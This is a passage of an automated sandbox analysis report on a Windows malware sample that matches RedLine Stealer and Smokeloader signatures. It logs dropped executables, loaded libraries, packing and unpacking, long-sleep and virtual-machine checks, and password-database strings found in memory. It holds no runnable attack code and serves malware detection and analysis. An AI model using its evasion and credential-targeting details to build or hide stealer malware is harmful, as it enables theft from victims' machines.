        Source: 0.2.Mmm7GmDcR4.exe.5609cc.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: Mmm7GmDcR4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 3B5A.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A07A6 CreateToolhelp32Snapshot,Module32First,0_2_005A07A6
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_0043B870
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\track_prt[1].htmJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeMutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7688
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile created: C:\Users\user\AppData\Local\Temp\3B5A.tmpJump to behavior
        Source: Mmm7GmDcR4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 3B5A.tmp.exe, 00000003.00000003.1407797696.0000000002E59000.00000004.00000800.00020000.00000000.sdmp, 3B5A.tmp.exe, 00000003.00000003.1407317733.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Mmm7GmDcR4.exeReversingLabs: Detection: 44%
        Source: Mmm7GmDcR4.exeVirustotal: Detection: 41%
        Source: unknownProcess created: C:\Users\user\Desktop\Mmm7GmDcR4.exe "C:\Users\user\Desktop\Mmm7GmDcR4.exe"
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeProcess created: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe "C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe"
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 1792
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeProcess created: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe "C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeUnpacked PE file: 0.2.Mmm7GmDcR4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeUnpacked PE file: 3.2.3B5A.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeUnpacked PE file: 0.2.Mmm7GmDcR4.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeUnpacked PE file: 3.2.3B5A.tmp.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00410756 push ecx; ret 0_2_00410769
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0040FD82 push ecx; ret 0_2_0040FD95
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A33B1 push 00000003h; ret 0_2_005A33B5
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A15F4 push es; iretd 0_2_005A1605
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A26C4 push ds; ret 0_2_005A26CD
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A59C0 pushad ; ret 0_2_005A59DC
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_005A5B3D push ecx; ret 0_2_005A5B5A
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0216798F push esp; retf 0_2_02167997
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021409BD push ecx; ret 0_2_021409D0
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0214CE08 push es; retf 0_2_0214CE0D
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02167F8D push esp; retf 0_2_02167F8E
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0213FFE9 push ecx; ret 0_2_0213FFFC
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02169DD8 pushad ; retf 0_2_02169DDF
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0216DDCE push dword ptr [esp+ecx-75h]; iretd 0_2_0216DDD2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh3_2_00441853
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00543CFE push esi; retn 001Ch3_2_00543D02
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00543156 push ebx; ret 3_2_00543157
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0054512A pushad ; ret 3_2_0054512B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00545195 pushfd ; ret 3_2_00545196
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078B05A push ebp; iretd 3_2_0078B05D
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A1AB7 push eax; mov dword ptr [esp], 0E0908DBh3_2_007A1ABA
        Source: Mmm7GmDcR4.exeStatic PE information: section name: .text entropy: 7.853906192557659
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.809678678911755
        Source: 3B5A.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.809678678911755
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeFile created: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeJump to dropped file
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E96A
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeWindow / User API: threadDelayed 404Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeWindow / User API: threadDelayed 9588Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-64944
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeAPI coverage: 5.1 %
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exe TID: 7672Thread sleep count: 404 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exe TID: 7672Thread sleep time: -291688s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exe TID: 7672Thread sleep count: 9588 > 30Jump to behavior
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exe TID: 7672Thread sleep time: -6922536s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe TID: 7708Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02168C49 FindFirstFileExW,0_2_02168C49
        Source: Amcache.hve.7.drBinary or memory string: VMware
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
        Source: 3B5A.tmp.exe, 00000003.00000003.1425169164.0000000002E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
        Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
